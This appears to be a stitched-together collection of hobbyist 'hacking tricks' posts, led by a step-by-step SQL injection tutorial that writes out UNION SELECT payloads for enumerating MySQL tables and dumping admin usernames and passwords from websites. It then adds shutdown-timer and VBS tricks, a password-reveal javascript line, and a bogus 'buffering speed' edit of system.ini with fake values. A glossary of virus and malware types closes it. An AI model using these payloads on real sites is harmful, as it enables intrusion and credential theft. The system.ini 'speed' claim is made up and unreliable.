SQL Injection in MySQL Databases:-
SQL
Injection attacks are code injections that exploit the database layer
of the application. This is most commonly the MySQL database, but there
are techniques to carry out this attack in other databases such as
Oracle. In this tutorial i will be showing you the steps to carry out
the attack on a MySQL Database.
Step 1:
When testing a website for SQL Injection vulnerabilities, you need to find a page that looks like this:
www.site.com/page=1
or
www.site.com/id=5
Basically
the site needs to have an = then a number or a string, but most
commonly a number. Once you have found a page like this, we test for
vulnerability by simply entering a ' after the number in the url. For
example:
www.site.com/page=1'
If the database is vulnerable, the page will spit out a MySQL error such as;
Warning:
mysql_num_rows(): supplied argument is not a valid MySQL result
resource in /home/wwwprof/public_html/readnews.php on line 29
If the page loads as normal then the database is not vulnerable, and the website is not vulnerable to SQL Injection.
Step 2
Now
we need to find the number of union columns in the database. We do this
using the "order by" command. We do this by entering "order by 1--",
"order by 2--" and so on until we receive a page error. For example:
www.site.com/page=1 order by 1--
http://www.site.com/page=1 order by 2--
http://www.site.com/page=1 order by 3--
http://www.site.com/page=1 order by 4--
http://www.site.com/page=1 order by 5--
If
we receive another MySQL error here, then that means we have 4 columns.
If the site errored on "order by 9" then we would have 8 columns. If
this does not work, instead of -- after the number, change it with /*,
as they are two difference prefixes and if one works the other tends not
too. It just depends on the way the database is configured as to which
prefix is used.
Step 3
We now are
going to use the "union" command to find the vulnerable columns. So we
enter after the url, union all select (number of columns)--,
for example:
www.site.com/page=1 union all select 1,2,3,4--
This
is what we would enter if we have 4 columns. If you have 7 columns you
would put,union all select 1,2,3,4,5,6,7-- If this is done successfully
the page should show a couple of numbers somewhere on the page. For
example, 2 and 3. This means columns 2 and 3 are vulnerable.
Step 4
We
now need to find the database version, name and user. We do this by
replacing the vulnerable column numbers with the following commands:
user()
database()
version()
or if these dont work try...
@@user
@@version
@@database
For example the url would look like:
www.site.com/page=1 union all select 1,user(),version(),4--
The resulting page would then show the database user and then the MySQL version. For example admin@localhost and MySQL 5.0.83.
IMPORTANT:
If the version is 5 and above read on to carry out the attack, if it is
4 and below, you have to brute force or guess the table and column
names, programs can be used to do this.
Step 5
In this step our aim is to list all the table names in the database. To do this we enter the following command after the url.
UNION SELECT 1,table_name,3,4 FROM information_schema.tables--
So the url would look like:
www.site.com/page=1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables--
Remember
the "table_name" goes in the vulnerable column number you found
earlier. If this command is entered correctly, the page should show all
the tables in the database, so look for tables that may contain useful
information such as passwords, so look for admin tables or member or
user tables.
Step 6
In this Step we want to list all the column names in the database, to do this we use the following command:
union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
So the url would look like this:
www.site.com/page=1
union all select 1,2,group_concat(column_name),4 from
information_schema.columns where table_schema=database()--
This
command makes the page spit out ALL the column names in the database. So
again, look for interesting names such as user,email and password.
Step 7
Finally
we need to dump the data, so say we want to get the "username" and
"password" fields, from table "admin" we would use the following
command,
union all select 1,2,group_concat(username,0x3a,password),4 from admin--
So the url would look like this:
www.site.com/page=1 union all select 1,2,group_concat(username,0x3a,password),4 from admin--
Here
the "concat" command matches up the username with the password so you
dont have to guess, if this command is successful then you should be
presented with a page full of usernames and passwords from the websit
How to Shutdown PC with timer
Do you know that you can make your PC shutdown at a time u wish to?
Here is the trick!!
How To Make A Shutdown Timer!
********** METHOD 1 ***************
1. Right click on your desktop and choose "New=>shortcuts".
2. In the box that says "Type the location of the shortcut",
type in "shutdown -s -t 3600" without the quotation marks and click
next. Note: 3600 are the amount of seconds before your computer shuts
down. So , 60secs*60mins=3600secs.
3. Make up a name for the shortcut and you're done.
You can change the icon by right clicking=>properities=>change icon=>browse
TO ABORT:
To make an abort key to stop the shutdown timer just create another shortcut and make
the "location of the shortcut" to " shutdown -a" without the quotes.
********* METHOD 2 *************
Here is another trick to shutdown at a specific time, for example you wish to shutdown at 11:35am. Type this in
start=>Run
Type Code: at 11:35 shutdown -s
TO ABORT:
Code:shutdown -a
MAKE UR PC TALK
Open a text file in notepad and write:
Dim msg, sapi
msg=InputBox("Enter your text","Talk it")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak msg
Save the file with a (*.vbs) extension, it will create a VBScript File.
It will prompt you for a text when u open the file, input the text and press ok."
u will hear what u typed this works in xp,may be in vista also.
enjoy!!!
Reveal *****(Asterisk) Passwords Using Javascript :-
Want to Reveal the Passwords Hidden Behind Asterisk (****) ?
Follow the steps given below-
1) Open the Login Page of any website. (eg. http://mail.yahoo.com)
2) Type your 'Username' and 'Password'.
3) Copy and paste the JavaScript code given below into your browser's address bar and press 'Enter'.
javascript: alert(document.getElementById('Passwd').value);
4) As soon as you press 'Enter', A window pops up showing Password typed by you..!
How to increase youtube/metacafe buffering speed
Wid this procedure
u can increase the buffering speed of uploaded videos
try it
porn
steps>>
1.start
2.run
3.type--system.ini
after that ull get system notepad file as
; for 16-bit app support
[drivers]
wave=mmdrv.dll
timer=timer.drv
[mci]
[driver32]
[386enh]
woafont=dosapp.FON
EGA80WOA.FON=EGA80WOA.FON
EGA40WOA.FON=EGA40WOA.FON
CGA80WOA.FON=CGA80WOA.FON
CGA40WOA.FON=CGA40WOA.FON
jus below this copy
this-------------->
page buffer=1000000Tbps
load=1000000Tbps
download=1000000Tbps
save=1000000Tbps
back=1000000Tbps
search=1000000Tbps
sound=1000000Tbps
webcam=1000000Tbps
voice=1000000Tbps
faxmodemfast=1000000Tbps
update=1000000Tbps
so totally it will look as for 16-bit app support
Virus Types
What is a Computer Virus ?
A
potentially damaging computer programme capable of reproducing itself
causing great harm to files or other programs without permission or
knowledge of the user.
Virus - A
program that when run, has the ability to self-replicate by infecting
other programs and files on your computer. These programs can have many
effects ranging from wiping your hard drive, displaying a joke in a
small box, or doing nothing at all except to replicate itself. These
types of infections tend to be localized to your computer and not have
the ability to spread to another computer on their own. The word virus
has incorrectly become a general term that encompasses trojans, worms,
and viruses.
Types of viruses :-
The different types of viruses are as follows-
1) Boot Sector Virus :-
Boot sector viruses infect either the master boot record of the hard
disk or the floppy drive. The boot record program responsible for the
booting of operating system is replaced by the virus. The virus either
copies the master boot program to another part of the hard disk or
overwrites it. They infect a computer when it boots up or when it
accesses the infected floppy disk in the floppy drive. i.e. Once a
system is infected with a boot-sector virus, any non-write-protected
disk accessed by this system will become infected.
Examples of boot- sector viruses are Michelangelo and Stoned.
2) File or Program Viruses :-Some
files/programs, when executed, load the virus in the memory and perform
predefined functions to infect the system. They infect program files
with extensions like .EXE, .COM, .BIN, .DRV and .SYS .
Some common file viruses are Sunday, Cascade.
3) Multipartite Viruses :-A
multipartite virus is a computer virus that infects multiple different
target platforms, and remains recursively infective in each target. It
attempts to attack both the boot sector and the executable, or programs,
files at the same time. When the virus attaches to the boot sector, it
will in turn affect the system’s files, and when the virus attaches to
the files, it will in turn infect the boot sector.
This type of virus can re-infect a system over and over again if all parts of the virus are not eradicated.
Ghostball was the first multipartite virus, discovered by Fridrik Skulason in October 1989.
Other examples are Invader, Flip, etc.
4) Stealth Viruses :-These
viruses are stealthy in nature means it uses various methods for hiding
themselves to avoid detection. They sometimes remove themselves from
the memory temporarily to avoid detection by antivirus. They are
somewhat difficult to detect. When an antivirus program tries to detect
the virus, the stealth virus feeds the antivirus program a clean image
of the file or boot sector.
5) Polymorphic Viruses :-Polymorphic
viruses have the ability to mutate implying that they change the viral
code known as the signature each time they spread or infect. Thus an
antivirus program which is scanning for specific virus codes unable to
detect it's presense.
6) Macro Viruses :-
A macro virus is a computer virus that "infects" a Microsoft Word or
similar application and causes a sequence of actions to be performed
automatically when the application is started or something else triggers
it. Macro viruses tend to be surprising but relatively harmless.A macro
virus is often spread as an e-mail virus. Well-known examples are
Concept Virus and Melissa Worm.
If
you use a computer, read the newspaper, or watch the news, you will
know about computer viruses or other malware. These are those malicious
programs that once they infect your machine will start causing havoc on
your computer. What many people do not know is that there are many
different types of infections that are categorized in the general
category of Malware.
Malware - Malware
is programming or files that are developed for the purpose of doing
harm. Thus, malware includes computer viruses, worms, Trojan horses,
spyware, hijackers, and certain type of adware.
This
article will focus on those malware that are considered viruses,
trojans, worms, and viruses, though this information can be used to
remove the other types of malware as well. We will not go into specific
details about any one particular infection, but rather provide a broad
overview of how these infections can be removed. For the most part these
instructions should allow you to remove a good deal of infections, but
there are some that need special steps to be removed and these won't be
covered under this tutorial.
Before we continue it is important to understand the generic malware terms that you will be reading about.
Backdoor- A
program that allows a remote user to execute commands and tasks on your
computer without your permission. These types of programs are typically
used to launch attacks on other computers, distribute copyrighted
software or media, or hack other computers.
Hijackers- A
program that attempts to hijack certain Internet functions like
redirecting your start page to the hijacker's own start page,
redirecting search queries to a undesired search engine, or replace
search results from popular search engines with their own information.
Spyware- A
program that monitors your activity or information on your computer and
sends that information to a remote computer without your Knowledge.
Adware- A
program that generates popups on your computer or displays
advertisements. It is important to note that not all adware programs are
necessarily considered malware.
There
are many legitimate programs that are given for free that display ads
in their programs in order to generate revenue. As long as this
information is provided up front then they are generally not considered
malware.
Dialler - A
program that typically dials a premium rate number that has per minute
charges over and above the typical call charge. These calls are with the
intent of gaining access to pornographic material.
Trojan- A
program that has been designed to appear innocent but has been
intentionally designed to cause some malicious activity or to provide a
backdoor to your system.
Worm- A
program that when run, has the ability to spread to other computers on
its own using either mass-mailing techniques to email addresses found on
your computer or by using the Internet to infect a remote computer
using known security holes.
